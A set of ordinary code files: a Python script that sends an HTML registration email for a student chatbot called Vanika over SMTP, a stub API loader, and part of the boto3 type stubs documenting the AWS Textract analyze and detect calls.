<div style="font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 12px; line-height: 1.2; color: #555555; mso-line-height-alt: 14px;">
<p style="font-size: 22px; line-height: 1.2; text-align: center; mso-line-height-alt: 26px; margin: 0;"><span style="font-size: 22px; color: #ffffff;"><strong>VANIKA</strong></span></p>
</div>
</div>
<!--[if mso]></td></tr></table><![endif]-->
<!--[if (!mso)&(!IE)]><!-->
</div>
<!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
<!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div style="background-color:#02A4E8;">
<div class="block-grid" style="Margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color:transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#02A4E8;"><tr><td align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:500px"><tr class="layout-full-width" style="background-color:transparent"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="500" style="background-color:transparent;width:500px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px;"><![endif]-->
<div class="col num12" style="min-width: 320px; max-width: 500px; display: table-cell; vertical-align: top; width: 500px;">
<div style="width:100% !important;">
<!--[if (!mso)&(!IE)]><!-->
<div style="border-top:0px solid transparent; border-left:0px solid transparent; border-bottom:0px solid transparent; border-right:0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;">
<!--<![endif]-->
<div align="center" class="img-container center autowidth" style="padding-right: 0px;padding-left: 0px;">
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr style="line-height:0px"><td style="padding-right: 0px;padding-left: 0px;" align="center"><![endif]--><img align="center" alt="Image" border="0" class="center autowidth" src="""+img+""" style="text-decoration: none; -ms-interpolation-mode: bicubic; border: 0; height: auto; width: 100%; max-width: 227px; display: block;" title="Image" width="227"/>
<!--[if mso]></td></tr></table><![endif]-->
</div>
<!--[if (!mso)&(!IE)]><!-->
</div>
<!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
<!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div style="background-color:#02A4E8;">
<div class="block-grid" style="Margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: #FFFFFF;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color:#FFFFFF;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#02A4E8;"><tr><td align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:500px"><tr class="layout-full-width" style="background-color:#FFFFFF"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="500" style="background-color:#FFFFFF;width:500px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px;"><![endif]-->
<div class="col num12" style="min-width: 320px; max-width: 500px; display: table-cell; vertical-align: top; width: 500px;">
<div style="width:100% !important;">
<!--[if (!mso)&(!IE)]><!-->
<div style="border-top:0px solid transparent; border-left:0px solid transparent; border-bottom:0px solid transparent; border-right:0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;">
<!--<![endif]-->
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px; font-family: Arial, sans-serif"><![endif]-->
<div style="color:#555555;font-family:Arial, 'Helvetica Neue', Helvetica, sans-serif;line-height:1.2;padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:10px;">
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Hi """+nickname+""",</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Selamat datang di Vanika, Terimakasih sudah melakukan registrasi menggunakan alamat email ini.</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Team Vanika mengembangkan Vanika untuk mempermudah mahasiswa mengakses Nilai berbentuk IPK, IPS dan transkrip serta Tagihan pembayaran melalui media Chatbot pada aplikasi LINE MESSENGER.</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Kami berharap mahasiswa dapat menggunakan Vanika dengan mudah, Vanika sendiri akan selalu dikembangkan dengan fitur-fitur lainnya.</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Feel free to use the student features and chat with Vanika.</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
<p style="font-size: 15px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 18px; margin: 0;"><span style="background-color: #ffffff; font-size: 15px;"><span style="background-color: #ffffff; font-size: 15px;">Have FUN.</span></span></p>
<p style="font-size: 12px; line-height: 1.2; color: #555555; font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; mso-line-height-alt: 14px; margin: 0;"> </p>
</div>
<!--[if mso]></td></tr></table><![endif]-->
<!--[if (!mso)&(!IE)]><!-->
</div>
<!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
<!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div style="background-color:#02A4E8;">
<div class="block-grid" style="Margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color:transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#02A4E8;"><tr><td align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:500px"><tr class="layout-full-width" style="background-color:transparent"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="500" style="background-color:transparent;width:500px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px;"><![endif]-->
<div class="col num12" style="min-width: 320px; max-width: 500px; display: table-cell; vertical-align: top; width: 500px;">
<div style="width:100% !important;">
<!--[if (!mso)&(!IE)]><!-->
<div style="border-top:0px solid transparent; border-left:0px solid transparent; border-bottom:0px solid transparent; border-right:0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;">
<!--<![endif]-->
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px; font-family: Arial, sans-serif"><![endif]-->
<div style="color:#555555;font-family:Arial, 'Helvetica Neue', Helvetica, sans-serif;line-height:1.2;padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:10px;">
<div style="font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 12px; line-height: 1.2; color: #555555; mso-line-height-alt: 14px;">
<p style="font-size: 14px; line-height: 1.2; text-align: center; mso-line-height-alt: 17px; margin: 0;"><span style="color: #ffffff; font-size: 14px;">This email is an automated message sent after registering at Vanika. If you did not register, please ignore this email.<br/></span></p>
</div>
</div>
<!--[if mso]></td></tr></table><![endif]-->
<!--[if (!mso)&(!IE)]><!-->
</div>
<!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
<!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div style="background-color:#02A4E8;">
<div class="block-grid" style="Margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color:transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#02A4E8;"><tr><td align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:500px"><tr class="layout-full-width" style="background-color:transparent"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="500" style="background-color:transparent;width:500px; border-top: 0px solid transparent; border-left: 0px solid transparent; border-bottom: 0px solid transparent; border-right: 0px solid transparent;" valign="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 0px; padding-left: 0px; padding-top:5px; padding-bottom:5px;"><![endif]-->
<div class="col num12" style="min-width: 320px; max-width: 500px; display: table-cell; vertical-align: top; width: 500px;">
<div style="width:100% !important;">
<!--[if (!mso)&(!IE)]><!-->
<div style="border-top:0px solid transparent; border-left:0px solid transparent; border-bottom:0px solid transparent; border-right:0px solid transparent; padding-top:5px; padding-bottom:5px; padding-right: 0px; padding-left: 0px;">
<!--<![endif]-->
<!--[if mso]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding-right: 10px; padding-left: 10px; padding-top: 10px; padding-bottom: 10px; font-family: Arial, sans-serif"><![endif]-->
<div style="color:#555555;font-family:Arial, 'Helvetica Neue', Helvetica, sans-serif;line-height:1.2;padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:10px;">
<div style="font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif; font-size: 12px; line-height: 1.2; color: #555555; mso-line-height-alt: 14px;">
<p style="font-size: 14px; line-height: 1.2; text-align: center; mso-line-height-alt: 17px; margin: 0;"><span style="color: #ffffff; font-size: 14px;">Made with ❤️ by Vanika Teams<br/></span></p>
<p style="font-size: 14px; line-height: 1.2; text-align: center; mso-line-height-alt: 17px; margin: 0;"><span style="color: #ffffff; font-size: 14px;">©Vanika 2019<br/></span></p>
<p style="font-size: 14px; line-height: 1.2; text-align: center; mso-line-height-alt: 17px; margin: 0;"><span style="color: #a0a0a0; font-size: 14px;">"""+user_id+"""<br/></span></p>
</div>
</div>
<!--[if mso]></td></tr></table><![endif]-->
<!--[if (!mso)&(!IE)]><!-->
</div>
<!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
<!--[if (mso)|(IE)]></td></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
</td>
</tr>
</tbody>
</table>
<!--[if (IE)]></div><![endif]-->
</body>
</html>
"""
# Record the MIME types of both parts - text/plain and text/html.
part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')
# Attach parts into the message container.
# Per RFC 2046, the last part of a multipart/alternative message (here the
# HTML part) is the preferred rendering, so the plain-text fallback goes first.
msg.attach(part1)
msg.attach(part2)
# Send the message via Gmail's SMTP server, upgrading the connection to TLS.
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo()  # re-identify ourselves over the now-encrypted connection
smtpserver.login(Config.email, Config.password)
# sendmail takes three arguments: the sender's address, the recipient's
# address, and the message to send - here serialized as a single string.
smtpserver.sendmail(me, you, msg.as_string())
smtpserver.quit()
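The multipart message sent above follows the standard `email.mime` pattern; a minimal self-contained sketch of that construction (the helper name and signature are illustrative, not from the original script):

```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def build_alternative_message(sender, recipient, subject, text_body, html_body):
    """Build a multipart/alternative message with a plain-text fallback."""
    msg = MIMEMultipart('alternative')
    msg['Subject'] = subject
    msg['From'] = sender
    msg['To'] = recipient
    # Per RFC 2046 the last part is the preferred rendering, so attach
    # the plain-text fallback first and the HTML version last.
    msg.attach(MIMEText(text_body, 'plain'))
    msg.attach(MIMEText(html_body, 'html'))
    return msg
```

Mail clients that can render HTML pick the last part they understand; text-only clients fall back to the first.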
# src/utils/api_loader.py (repo: amasiukevich/ALHE)
import requests
def load_from_api():
    pass
# boto3_type_annotations/textract/client.py (repo: cowboygneox/boto3_type_annotations)
from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def analyze_document(self, Document: Dict, FeatureTypes: List) -> Dict:
"""
Analyzes an input document for relationships between detected items.
The types of information returned are as follows:
* Words and lines that are related to nearby lines and words. The related information is returned in two Block objects each of type ``KEY_VALUE_SET`` : a KEY Block object and a VALUE Block object. For example, *Name: Ana Silva Carolina* contains a key and value. *Name:* is the key. *Ana Silva Carolina* is the value.
* Table and table cell data. A TABLE Block object contains information about a detected table. A CELL Block object is returned for each cell in a table.
* Selectable elements such as checkboxes and radio buttons. A SELECTION_ELEMENT Block object contains information about a selectable element.
* Lines and words of text. A LINE Block object contains one or more WORD Block objects.
You can choose which type of analysis to perform by specifying the ``FeatureTypes`` list.
The output is returned in a list of ``BLOCK`` objects.
``AnalyzeDocument`` is a synchronous operation. To analyze documents asynchronously, use StartDocumentAnalysis .
For more information, see `Document Text Analysis <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-analyzing.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/AnalyzeDocument>`_
**Request Syntax**
::
response = client.analyze_document(
Document={
'Bytes': b'bytes',
'S3Object': {
'Bucket': 'string',
'Name': 'string',
'Version': 'string'
}
},
FeatureTypes=[
'TABLES'|'FORMS',
]
)
**Response Syntax**
::
{
'DocumentMetadata': {
'Pages': 123
},
'Blocks': [
{
'BlockType': 'KEY_VALUE_SET'|'PAGE'|'LINE'|'WORD'|'TABLE'|'CELL'|'SELECTION_ELEMENT',
'Confidence': ...,
'Text': 'string',
'RowIndex': 123,
'ColumnIndex': 123,
'RowSpan': 123,
'ColumnSpan': 123,
'Geometry': {
'BoundingBox': {
'Width': ...,
'Height': ...,
'Left': ...,
'Top': ...
},
'Polygon': [
{
'X': ...,
'Y': ...
},
]
},
'Id': 'string',
'Relationships': [
{
'Type': 'VALUE'|'CHILD',
'Ids': [
'string',
]
},
],
'EntityTypes': [
'KEY'|'VALUE',
],
'SelectionStatus': 'SELECTED'|'NOT_SELECTED',
'Page': 123
},
]
}
**Response Structure**
- *(dict) --*
- **DocumentMetadata** *(dict) --*
Metadata about the analyzed document. An example is the number of pages.
- **Pages** *(integer) --*
The number of pages detected in the document.
- **Blocks** *(list) --*
The text that's detected and analyzed by ``AnalyzeDocument`` .
- *(dict) --*
A ``Block`` represents items that are recognized in a document within a group of pixels close to each other. The information returned in a ``Block`` depends on the type of operation. In document-text detection (for example DetectDocumentText ), you get information about the detected words and lines of text. In text analysis (for example AnalyzeDocument ), you can also get information about the fields, tables and selection elements that are detected in the document.
An array of ``Block`` objects is returned by both synchronous and asynchronous operations. In synchronous operations, such as DetectDocumentText , the array of ``Block`` objects is the entire set of results. In asynchronous operations, such as GetDocumentAnalysis , the array is returned over one or more responses.
For more information, see `How Amazon Textract Works <https://docs.aws.amazon.com/textract/latest/dg/how-it-works.html>`__ .
- **BlockType** *(string) --*
The type of text that's recognized in a block. In text-detection operations, the following types are returned:
* *PAGE* - Contains a list of the LINE Block objects that are detected on a document page.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
In text analysis operations, the following types are returned:
* *PAGE* - Contains a list of child Block objects that are detected on a document page.
* *KEY_VALUE_SET* - Stores the KEY and VALUE Block objects for a field that's detected on a document page. Use the ``EntityType`` field to determine if a KEY_VALUE_SET object is a KEY Block object or a VALUE Block object.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces that's detected on a document page.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
* *TABLE* - A table that's detected on a document page. A table is any grid-based information with 2 or more rows or columns with a cell span of 1 row and 1 column each.
* *CELL* - A cell within a detected table. The cell is the parent of the block that contains the text in the cell.
* *SELECTION_ELEMENT* - A selectable element such as a radio button or checkbox that's detected on a document page. Use the value of ``SelectionStatus`` to determine the status of the selection element.
- **Confidence** *(float) --*
The confidence that Amazon Textract has in the accuracy of the recognized text and the accuracy of the geometry points around the recognized text.
- **Text** *(string) --*
The word or line of text that's recognized by Amazon Textract.
- **RowIndex** *(integer) --*
The row in which a table cell is located. The first row position is 1. ``RowIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnIndex** *(integer) --*
The column in which a table cell appears. The first column position is 1. ``ColumnIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **RowSpan** *(integer) --*
The number of rows that a table spans. ``RowSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnSpan** *(integer) --*
The number of columns that a table cell spans. ``ColumnSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **Geometry** *(dict) --*
The location of the recognized text on the image. It includes an axis-aligned, coarse bounding box that surrounds the text, and a finer-grain polygon for more accurate spatial information.
- **BoundingBox** *(dict) --*
An axis-aligned coarse representation of the location of the recognized text on the document page.
- **Width** *(float) --*
The width of the bounding box as a ratio of the overall document page width.
- **Height** *(float) --*
The height of the bounding box as a ratio of the overall document page height.
- **Left** *(float) --*
The left coordinate of the bounding box as a ratio of overall document page width.
- **Top** *(float) --*
The top coordinate of the bounding box as a ratio of overall document page height.
- **Polygon** *(list) --*
Within the bounding box, a fine-grained polygon around the recognized text.
- *(dict) --*
The X and Y coordinates of a point on a document page. The X and Y values returned are ratios of the overall document page size. For example, if the input document is 700 x 200 and the operation returns X=0.5 and Y=0.25, then the point is at the (350,50) pixel coordinate on the document page.
An array of ``Point`` objects, ``Polygon`` , is returned by DetectDocumentText . ``Polygon`` represents a fine-grained polygon around detected text. For more information, see Geometry in the Amazon Textract Developer Guide.
- **X** *(float) --*
The value of the X coordinate for a point on a ``Polygon`` .
- **Y** *(float) --*
The value of the Y coordinate for a point on a ``Polygon`` .
- **Id** *(string) --*
The identifier for the recognized text. The identifier is only unique for a single operation.
- **Relationships** *(list) --*
A list of child blocks of the current block. For example a LINE object has child blocks for each WORD block that's part of the line of text. There aren't Relationship objects in the list for relationships that don't exist, such as when the current block has no child blocks. The list size can be the following:
* 0 - The block has no child blocks.
* 1 - The block has child blocks.
- *(dict) --*
Information about how blocks are related to each other. A ``Block`` object contains 0 or more ``Relation`` objects in a list, ``Relationships`` . For more information, see Block .
The ``Type`` element provides the type of the relationship for all blocks in the ``IDs`` array.
- **Type** *(string) --*
The type of relationship that the blocks in the IDs array have with the current block. The relationship can be ``VALUE`` or ``CHILD`` .
- **Ids** *(list) --*
An array of IDs for related blocks. You can get the type of the relationship from the ``Type`` element.
- *(string) --*
- **EntityTypes** *(list) --*
The type of entity. The following can be returned:
* *KEY* - An identifier for a field on the document.
* *VALUE* - The field text.
``EntityTypes`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- *(string) --*
- **SelectionStatus** *(string) --*
The selection status of a selectable element such as a radio button or checkbox.
- **Page** *(integer) --*
The page in which a block was detected. ``Page`` is returned by asynchronous operations. Page values greater than 1 are only returned for multi-page documents that are in PDF format. A scanned image (JPG/PNG), even if it contains multiple document pages, is always considered to be a single-page document and the value of ``Page`` is always 1. Synchronous operations don't return ``Page`` as every input document is considered to be a single-page document.
:type Document: dict
:param Document: **[REQUIRED]**
The input document as base64-encoded bytes or an Amazon S3 object. If you use the AWS CLI to call Amazon Textract operations, you can\'t pass image bytes. The document must be an image in JPG or PNG format.
If you are using an AWS SDK to call Amazon Textract, you might not need to base64-encode image bytes passed using the ``Bytes`` field.
- **Bytes** *(bytes) --*
A blob of base-64 encoded documents bytes. The maximum size of a document that\'s provided in a blob of bytes is 5 MB. The document bytes must be in PNG or JPG format.
If you are using an AWS SDK to call Amazon Textract, you might not need to base64-encode image bytes passed using the ``Bytes`` field.
- **S3Object** *(dict) --*
Identifies an S3 object as the document source. The maximum size of a document stored in an S3 bucket is 5 MB.
- **Bucket** *(string) --*
The name of the S3 bucket.
- **Name** *(string) --*
The file name of the input document. It must be an image file (.JPG or .PNG format). Asynchronous operations also support PDF files.
- **Version** *(string) --*
If the bucket has versioning enabled, you can specify the object version.
:type FeatureTypes: list
:param FeatureTypes: **[REQUIRED]**
A list of the types of analysis to perform. Add TABLES to the list to return information about the tables detected in the input document. Add FORMS to return detected fields and the associated text. To perform both types of analysis, add TABLES and FORMS to ``FeatureTypes`` .
- *(string) --*
:rtype: dict
:returns:
"""
pass
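The KEY_VALUE_SET relationships described in the docstring above can be resolved into plain key/value strings by walking the block graph. A rough sketch, assuming a response shaped like the syntax shown there (the function names are mine, not part of the API):

```python
def text_for_block(block, blocks_by_id):
    """Concatenate the WORD children of a block into one string."""
    words = []
    for rel in block.get('Relationships', []):
        if rel['Type'] == 'CHILD':
            for child_id in rel['Ids']:
                child = blocks_by_id[child_id]
                if child['BlockType'] == 'WORD':
                    words.append(child['Text'])
    return ' '.join(words)

def key_value_pairs(blocks):
    """Pair each KEY block with the text of its VALUE blocks."""
    blocks_by_id = {b['Id']: b for b in blocks}
    pairs = {}
    for block in blocks:
        if block['BlockType'] == 'KEY_VALUE_SET' and 'KEY' in block.get('EntityTypes', []):
            key_text = text_for_block(block, blocks_by_id)
            for rel in block.get('Relationships', []):
                if rel['Type'] == 'VALUE':
                    for value_id in rel['Ids']:
                        pairs[key_text] = text_for_block(blocks_by_id[value_id], blocks_by_id)
    return pairs
```

For the *Name: Ana Silva Carolina* example, this would map the KEY text "Name:" to the VALUE text of its related block.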
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def detect_document_text(self, Document: Dict) -> Dict:
"""
Detects text in the input document. Amazon Textract can detect lines of text and the words that make up a line of text. The input document must be an image in JPG or PNG format. ``DetectDocumentText`` returns the detected text in an array of Block objects.
Each document page has as an associated ``Block`` of type PAGE. Each PAGE ``Block`` object is the parent of LINE ``Block`` objects that represent the lines of detected text on a page. A LINE ``Block`` object is a parent for each word that makes up the line. Words are represented by ``Block`` objects of type WORD.
``DetectDocumentText`` is a synchronous operation. To analyze documents asynchronously, use StartDocumentTextDetection .
For more information, see `Document Text Detection <https://docs.aws.amazon.com/textract/latest/dg/how-it-works-detecting.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/textract-2018-06-27/DetectDocumentText>`_
**Request Syntax**
::
response = client.detect_document_text(
Document={
'Bytes': b'bytes',
'S3Object': {
'Bucket': 'string',
'Name': 'string',
'Version': 'string'
}
}
)
**Response Syntax**
::
{
'DocumentMetadata': {
'Pages': 123
},
'Blocks': [
{
'BlockType': 'KEY_VALUE_SET'|'PAGE'|'LINE'|'WORD'|'TABLE'|'CELL'|'SELECTION_ELEMENT',
'Confidence': ...,
'Text': 'string',
'RowIndex': 123,
'ColumnIndex': 123,
'RowSpan': 123,
'ColumnSpan': 123,
'Geometry': {
'BoundingBox': {
'Width': ...,
'Height': ...,
'Left': ...,
'Top': ...
},
'Polygon': [
{
'X': ...,
'Y': ...
},
]
},
'Id': 'string',
'Relationships': [
{
'Type': 'VALUE'|'CHILD',
'Ids': [
'string',
]
},
],
'EntityTypes': [
'KEY'|'VALUE',
],
'SelectionStatus': 'SELECTED'|'NOT_SELECTED',
'Page': 123
},
]
}
**Response Structure**
- *(dict) --*
- **DocumentMetadata** *(dict) --*
Metadata about the document. Contains the number of pages that are detected in the document.
- **Pages** *(integer) --*
The number of pages detected in the document.
- **Blocks** *(list) --*
An array of Block objects containing the text detected in the document.
- *(dict) --*
A ``Block`` represents items that are recognized in a document within a group of pixels close to each other. The information returned in a ``Block`` depends on the type of operation. In document-text detection (for example DetectDocumentText ), you get information about the detected words and lines of text. In text analysis (for example AnalyzeDocument ), you can also get information about the fields, tables and selection elements that are detected in the document.
An array of ``Block`` objects is returned by both synchronous and asynchronous operations. In synchronous operations, such as DetectDocumentText , the array of ``Block`` objects is the entire set of results. In asynchronous operations, such as GetDocumentAnalysis , the array is returned over one or more responses.
For more information, see `How Amazon Textract Works <https://docs.aws.amazon.com/textract/latest/dg/how-it-works.html>`__ .
- **BlockType** *(string) --*
The type of text that's recognized in a block. In text-detection operations, the following types are returned:
* *PAGE* - Contains a list of the LINE Block objects that are detected on a document page.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
In text analysis operations, the following types are returned:
* *PAGE* - Contains a list of child Block objects that are detected on a document page.
* *KEY_VALUE_SET* - Stores the KEY and VALUE Block objects for a field that's detected on a document page. Use the ``EntityType`` field to determine if a KEY_VALUE_SET object is a KEY Block object or a VALUE Block object.
* *WORD* - A word detected on a document page. A word is one or more ISO basic Latin script characters that aren't separated by spaces that's detected on a document page.
* *LINE* - A string of tab-delimited, contiguous words that's detected on a document page.
* *TABLE* - A table that's detected on a document page. A table is any grid-based information with 2 or more rows or columns with a cell span of 1 row and 1 column each.
* *CELL* - A cell within a detected table. The cell is the parent of the block that contains the text in the cell.
* *SELECTION_ELEMENT* - A selectable element such as a radio button or checkbox that's detected on a document page. Use the value of ``SelectionStatus`` to determine the status of the selection element.
- **Confidence** *(float) --*
The confidence that Amazon Textract has in the accuracy of the recognized text and the accuracy of the geometry points around the recognized text.
- **Text** *(string) --*
The word or line of text that's recognized by Amazon Textract.
- **RowIndex** *(integer) --*
The row in which a table cell is located. The first row position is 1. ``RowIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnIndex** *(integer) --*
The column in which a table cell appears. The first column position is 1. ``ColumnIndex`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **RowSpan** *(integer) --*
The number of rows that a table spans. ``RowSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **ColumnSpan** *(integer) --*
The number of columns that a table cell spans. ``ColumnSpan`` isn't returned by ``DetectDocumentText`` and ``GetDocumentTextDetection`` .
- **Geometry** *(dict) --*
The location of the recognized text on the image. It includes an axis-aligned, coarse bounding box that surrounds the text, and a finer-grain polygon for more accurate spatial information.
- **BoundingBox** *(dict) --*
An axis-aligned coarse representation of the location of the recognized text on the document page.
- **Width** *(float) --*
The width of the bounding box as a ratio of the overall document page width.
- **Height** *(float) --*
The height of the bounding box as a ratio of the overall document page height.
- **Left** *(float) --*
The left coordinate of the bounding box as a ratio of overall document page width.
- **Top** *(float) --*
The top coordinate of the bounding box as a ratio of overall document page height.
- **Polygon** *(list) --*
Within the bounding box, a fine-grained polygon around the recognized text.
- *(dict) --*
The X and Y coordinates of a point on a document page. The X and Y values returned are ratios of the overall document page size. For example, if the input document is 700 x 200 and the operation returns X=0.5 and Y=0.25, then the point is at the (350,50) pixel coordinate on the document page.
An array of ``Point`` objects, ``Polygon`` , is returned by DetectDocumentText . ``Polygon`` represents a fine-grained polygon around detected text. For more information, see Geometry in the Amazon Textract Developer Guide.
- **X** *(float) --*
The value of the X coordinate for a point on a ``Polygon`` .
- **Y** *(float) --*
The value of the Y coordinate for a point on a ``Polygon`` .
- **Id** *(string) --*
